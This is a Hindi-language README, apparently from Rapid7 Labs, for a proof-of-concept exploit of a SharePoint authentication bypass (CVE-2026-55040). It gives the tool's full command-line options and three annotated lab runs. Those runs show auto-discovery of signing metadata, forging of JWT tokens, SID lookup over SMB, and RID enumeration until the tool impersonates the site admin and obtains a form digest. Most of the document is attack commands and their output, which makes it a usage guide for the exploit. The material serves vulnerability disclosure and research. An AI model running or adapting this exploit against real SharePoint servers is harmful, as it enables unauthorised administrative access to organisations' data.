
Microsoft SharePoint CVE-2026-55040 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो जाली JWT टोकन बनाता है, प्रमाणीकरण को बायपास करता है, मेटाडेटा का स्वतः पता लगाता है, और SID एन्यूमरेशन के जरिए साइट एडमिन का रूप धारण करता है।
CVE-2026-55040.py SharePoint प्रमाणीकरण बायपास भेद्यता, CVE-2026-55040 का लाभ उठाने के लिए एक proof-of-concept स्क्रिप्ट है।
पूर्ण तकनीकी विश्लेषण के लिए, हमारा Rapid7 Analysis देखें।
$ python CVE-2026-55040.py --help
usage: CVE-2026-55040.py [-h] [--target TARGET] [--host HOST] [--x5t X5T] [--realm REALM] [--sid SID] [--upn UPN]
[--auto-upn] [--username USERNAME] [--rid RID] [--max-rid MAX_RID] [--port PORT]
[--domain-ip DOMAIN_IP] [--http]
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
options:
-h, --help show this help message and exit
--target TARGET Target IP address (auto-discovers all params)
--host HOST SharePoint hostname (auto-discovered)
--x5t X5T STS signing cert x5t (auto-discovered from metadata)
--realm REALM SharePoint realm GUID (auto-discovered from metadata)
--sid SID Windows SID for identity (auto-discovered via LSARPC)
--upn UPN UPN for identity, e.g. [email protected] (alternative to --sid, no SMB needed)
--auto-upn Auto-construct UPN from HTTPS cert domain (no SMB needed; derives host from cert)
--username USERNAME Username for --auto-upn (default: administrator)
--rid RID Specific RID to use (skips iteration). If not set, auto-SID iterates 500 then 1000+ to find a
site admin
--max-rid MAX_RID Max RID to try during auto-SID iteration (default: 10000)
--port PORT Non-standard port for target web service (default: 443 for HTTPS, 80 for HTTP)
--domain-ip DOMAIN_IP
Domain controller IP for SMB/LSARPC discovery (default: same as --target). Use when the DC is
a different system than the SharePoint server
--http Use HTTP instead of HTTPS (disables auto-discovery; must supply --host, --x5t, --realm, --sid
manually)
केवल --host के माध्यम से एक लक्ष्य होस्टनाम प्रदान करके, जाली JWT NT AUTHORITY\LOCAL SERVICE उपयोगकर्ता के लिए AccessToken नामकरण पहचान का उपयोग करेगा।
नोट: जबकि प्रमाणीकरण बायपास सफल होगा, AccessToken पहचान के माध्यम से आप जिन संसाधनों तक पहुँच सकते हैं वे सीमित हैं। उदाहरण के लिए, आप /_api/contextinfo जैसे कुछ एंडपॉइंट्स तक पहुँचने में असमर्थ हैं (नीचे "फ़ॉर्म डाइजेस्ट प्राप्त करना" ऑपरेशन के दौरान दिखाया गया है), लेकिन आप अन्य सुरक्षित संसाधनों तक पहुँच सकते हैं, उदाहरण के लिए /_vti_bin/sites.asmx। प्रमाणीकरण बायपास जिस अगली भेद्यता के साथ श्रृंखलाबद्ध है, उसके आधार पर, AccessToken नामकरण पहचान का उपयोग करना व्यवहार्य हो सकता है।
$ python3 CVE-2026-55040.py --host WIN-FG3H2SKPOTA.fritz.box
======================================================================
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
======================================================================
[1] Auto-discovery...
[+] Discovering x5t and realm from STS metadata...
[*] x5t: 84eAgzfNOtqgEPs8usO4Jr_0Zf8
[*] realm: 0e2603c3-5eef-4d0f-90ca-53ee9a7729a4
[+] No --domain-ip/--sid/--upn provided; using local service identity
[+] Targeting: https://WIN-FG3H2SKPOTA.fritz.box
[2] Forging JWT token...
[+] Token forged (1025 bytes)
[3] Obtaining form digest...
[-] Failed to get digest. Response: {"odata.error":{"code":"-2147024891, System.UnauthorizedAccessException","message":{"lang":"en-US","value":"Access denied. You do not have permission to perform this action or access this resource."}}}
--host के माध्यम से एक लक्ष्य होस्टनाम और संबंधित डोमेन कंट्रोलर का --domain-ip प्रदान करके, जाली JWT एक Windows Security Identifier (SID) उपयोगकर्ता के लिए urn:office:idp:activedirectory नामकरण पहचान का उपयोग करेगा। साइट व्यवस्थापक खोजने के लिए इस उपयोगकर्ता का SID स्वतः खोजा जाता है।
यदि आप पहले से SID जानते हैं, तो आप --domain-ip छोड़ सकते हैं और ज्ञात SID को --sid के माध्यम से पास कर सकते हैं।
$ python3 -m pipx install impacket
$ python3 CVE-2026-55040.py --host WIN-FG3H2SKPOTA.fritz.box --domain-ip 192.168.86.11
======================================================================
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
======================================================================
[1] Auto-discovery...
[+] Discovering x5t and realm from STS metadata...
[*] x5t: 84eAgzfNOtqgEPs8usO4Jr_0Zf8
[*] realm: 0e2603c3-5eef-4d0f-90ca-53ee9a7729a4
[+] Discovering domain SID via SMB (192.168.86.11)...
[*] domain_sid: S-1-5-21-4203888158-2793536450-3921675298 (will iterate RIDs)
[*] DC differs from target; will discover SharePoint hostname separately
[+] Targeting: https://WIN-FG3H2SKPOTA.fritz.box
[+] Iterating RIDs to find site admin (500, then 1000-10000)...
[-] RID 500: no valid user
[-] RID 1000: no valid user
[-] RID 1050: no valid user
[-] RID 1100: no valid user
[-] RID 1150: no valid user
[-] RID 1200: no valid user
[-] RID 1250: no valid user
[-] RID 1300: no valid user
[-] RID 1350: no valid user
[-] RID 1400: no valid user
[-] RID 1450: no valid user
[-] RID 1500: no valid user
[-] RID 1550: no valid user
[-] RID 1600: no valid user
[+] RID 1602: i:0#.w|testdomain2\testuser1 (testuser1)
[+] RID 1605: SHAREPOINT\system (System Account) ** SITE ADMIN **
[+] Found site admin at RID 1605, stopping scan
[+] Using site admin SID: S-1-5-21-4203888158-2793536450-3921675298-1605
[+] Login: SHAREPOINT\system
[2] Forging JWT token...
[+] Token forged (1040 bytes)
[3] Obtaining form digest...
[+] Digest obtained.
--host के माध्यम से एक लक्ष्य होस्टनाम और किसी ज्ञात साइट उपयोगकर्ता का --upn प्रदान करके, जाली JWT दिए गए User Principal Name (UPN) के लिए urn:office:idp:activedirectory नामकरण पहचान का उपयोग करेगा।
$ python3 CVE-2026-55040.py --host WIN-79B765S1R4G --upn [email protected]
======================================================================
Rapid7 Labs - Microsoft SharePoint Authentication Bypass (CVE-2026-55040)
======================================================================
[1] Auto-discovery...
[+] Discovering x5t and realm from STS metadata...
[*] x5t: a1g8DVePm6FB892C0AAB23-Wl7M
[*] realm: 66aaa1e2-b658-41c4-8911-ff2d5bab5423
[+] Targeting: https://WIN-79B765S1R4G
[2] Forging JWT token...
[+] Token forged (1047 bytes)
[3] Obtaining form digest...
[+] Digest obtained.